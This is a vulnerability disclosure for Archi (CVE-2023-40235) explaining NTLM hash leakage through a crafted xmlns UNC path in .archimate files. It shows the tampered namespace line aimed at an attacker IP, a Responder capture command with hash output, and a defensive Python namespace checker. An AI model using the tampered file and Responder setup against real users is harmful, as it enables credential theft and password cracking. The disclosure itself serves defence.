CVE-2023-40235: NTLM Hash Disclosure (v5.0.2) · Issue #946 · archimatetool/archi
An NTLM Hash Disclosure was discovered in ArchiMate Archi before 5.1.0. When parsing the XMLNS value of an ArchiMate project file, if the namespace does not match the expected ArchiMate URL, the parser will access the provided resource. If the provided resource is a UNC path pointing to a share server that does not accept a guest account, the host will try to authenticate on the share by using the current user’s session. NOTE: this issue occurs because Archi uses an unsafe configuration of the Eclipse Modeling Framework.
Version of Archi
5.0.2
Description
When parsing the XMLNS value of an archimate project file, if the namespace does not match the expected archimate URL, the parser will access the provided resource. If the provided resource is a UNC path pointing to a share server that does not accept a guest account, the host will try to authenticate on the share using the current user’s session.
Impact
A malicious user can capture the NTLM hash of the authenticated user running the application. With the captured hashes, offline password cracking can be performed in order to guess the password and gain unauthorized access to the server.
Technical fix
Do not allow the application’s functionality to resolve or load UNC paths.
Technical Details
“archimate” projects are saved as XML files using the extension .archimate. The example below is an archimate project with a single BusinessActor element (John Doe) present in the “Business” folder. That element is placed on the diagram “Default View” (linked by the ID e79145c…).
<?xml version="1.0" encoding="UTF-8"?>
<archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:archimate="http://www.archimatetool.com/archimate" name="(new model)" id="id-81d2dc112d96489ea22c7f336df894cd" version="5.0.0">
  <folder name="Strategy" id="id-2ab87f8808194aafb76570f1480511a1" type="strategy"/>
  <folder name="Business" id="id-2e5d95fb12be42589b1e494dfc79dd2a" type="business">
    <element xsi:type="archimate:BusinessActor" name="John Doe" id="id-e79145cce35a4704a19ba22885cfc9d2"/>
  </folder>
  <folder name="Application" id="id-53a1acc2e38c4d7db125ccd25dc6892d" type="application"/>
  <folder name="Technology &amp; Physical" id="id-24c7dc79bf11478ea65391ef16835543" type="technology"/>
  <folder name="Motivation" id="id-dc391a764cd141d389af3b3b4a81a94a" type="motivation"/>
  <folder name="Implementation &amp; Migration" id="id-90400d4328f448779016a63ad6eab713" type="implementation_migration"/>
  <folder name="Other" id="id-276cb2473edf4874a5854257ed930166" type="other"/>
  <folder name="Relations" id="id-8a1f3df198fa44c7b271f846e4fa1d12" type="relations"/>
  <folder name="Views" id="id-bdcce9aa0bb64f4386ebc4ef4a90fa1b" type="diagrams">
    <element xsi:type="archimate:ArchimateDiagramModel" name="Default View" id="id-fb6015c3baa2446d90238f15a70a5adb">
      <child xsi:type="archimate:DiagramObject" id="id-be3e6f080b904e2496cf1d89f8965c15" archimateElement="id-e79145cce35a4704a19ba22885cfc9d2">
        <bounds x="571" y="332" width="120" height="55"/>
      </child>
    </element>
  </folder>
</archimate:model>
The xmlns:archimate attribute points to http://www.archimatetool.com/archimate. However, if the value is modified, the parser will try to access the resource; if a UNC path is provided, the host will try to access the share and, if required, authenticate to it.
In the following example, the attacker is running the Responder tool (Responder.py) listening on the interface 172.16.227.1. The archimate project file is modified so that xmlns:archimate points to \\172.16.227.1\share\archimate.
<?xml version="1.0" encoding="UTF-8"?>
<archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:archimate="\\172.16.227.1\share\archimate" name="(new model)" id="id-81d2dc112d96489ea22c7f336df894cd" version="5.0.0">
[...]
Whenever the victim opens the modified file, the application will try to access the resource via the host and authenticate on the fake SMB share created by Responder.py.
sudo ./Responder.py -I vmnet8
[...]
[+] Listening for events...
[...]
[SMB] NTLMv2-SSP Client: 172.16.227.169
[SMB] NTLMv2-SSP Username : LAB\tester
[SMB] NTLMv2-SSP Hash:
test::LAB:xxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxx[...]
As seen in the output above, the NTLM hash is leaked and could be used to crack the user’s password.
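The technical fix above asks that the application never resolve or load UNC paths from a namespace declaration. A simple defensive pre-flight check, written here as an added example and not as Archi's own code, is to read the xmlns declarations of an .archimate file with a parser that treats namespace URIs as plain strings and to refuse the file if the archimate prefix does not carry the expected URL or if any declared namespace is a UNC or file path. The function names and the two sample documents are constructed for illustration; the expected namespace URL and the UNC example are the ones shown in this issue.

```python
"""
Pre-load check for .archimate files: flag namespace declarations that would make an
XML/EMF loader reach out to an unexpected resource, such as a UNC path.

Added example, not Archi's code. Function names and sample documents are constructed.
"""
import io
import re
import xml.etree.ElementTree as ET

# Namespace Archi expects for the "archimate" prefix (taken from the advisory).
EXPECTED_ARCHIMATE_NS = "http://www.archimatetool.com/archimate"

# Namespaces a well-formed Archi model may declare without being resolved anywhere.
ALLOWED_NAMESPACES = {
    "http://www.w3.org/2001/XMLSchema-instance",
    EXPECTED_ARCHIMATE_NS,
}

# UNC path: two backslashes (or forward slashes), a host, then an optional separator.
UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+(?:[\\/]|$)")
# URI schemes whose resolution would touch the local filesystem or a network share.
RISKY_SCHEMES = ("file:", "smb:")


def collect_namespaces(xml_text: str) -> list[tuple[str, str]]:
    """Return (prefix, uri) pairs for every xmlns declaration, in document order.

    iterparse's 'start-ns' events expose the declarations without resolving them:
    ElementTree treats namespace URIs as opaque strings and performs no I/O on them.
    """
    source = io.BytesIO(xml_text.encode("utf-8"))
    return [value for _event, value in ET.iterparse(source, events=("start-ns",))]


def check_archimate_namespaces(xml_text: str) -> list[str]:
    """Return human-readable findings; an empty list means no suspicious declaration."""
    findings = []
    for prefix, uri in collect_namespaces(xml_text):
        label = f"xmlns:{prefix}" if prefix else "xmlns"
        if UNC_RE.match(uri) or uri.lower().startswith(RISKY_SCHEMES):
            findings.append(f"{label} points to a UNC/file resource: {uri!r}")
        elif prefix == "archimate" and uri != EXPECTED_ARCHIMATE_NS:
            findings.append(f"{label} is {uri!r}, expected {EXPECTED_ARCHIMATE_NS!r}")
        elif uri not in ALLOWED_NAMESPACES:
            findings.append(f"{label} declares an unexpected namespace: {uri!r}")
    return findings


def is_safe_to_open(xml_text: str) -> bool:
    """True when the file carries only the expected, non-resolving namespaces."""
    return not check_archimate_namespaces(xml_text)


# Constructed samples: a minimal benign model, and the same model with its
# archimate namespace rewritten to the UNC path shown in the advisory.
BENIGN_MODEL = """<?xml version="1.0" encoding="UTF-8"?>
<archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:archimate="http://www.archimatetool.com/archimate"
    name="(new model)" id="id-example" version="5.0.0">
  <folder name="Business" id="id-folder" type="business"/>
</archimate:model>
"""
TAMPERED_MODEL = BENIGN_MODEL.replace(
    EXPECTED_ARCHIMATE_NS, r"\\172.16.227.1\share\archimate", 1
)

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_MODEL), ("tampered", TAMPERED_MODEL)):
        verdict = "OK" if is_safe_to_open(doc) else "REJECT"
        print(f"{name}: {verdict}")
        for finding in check_archimate_namespaces(doc):
            print("  -", finding)
```

Run the script as-is to see the benign model accepted and the tampered one rejected with the offending declaration named; the check costs nothing because no namespace URI is ever dereferenced by ElementTree, which is exactly the property the EMF loader in the affected versions lacked.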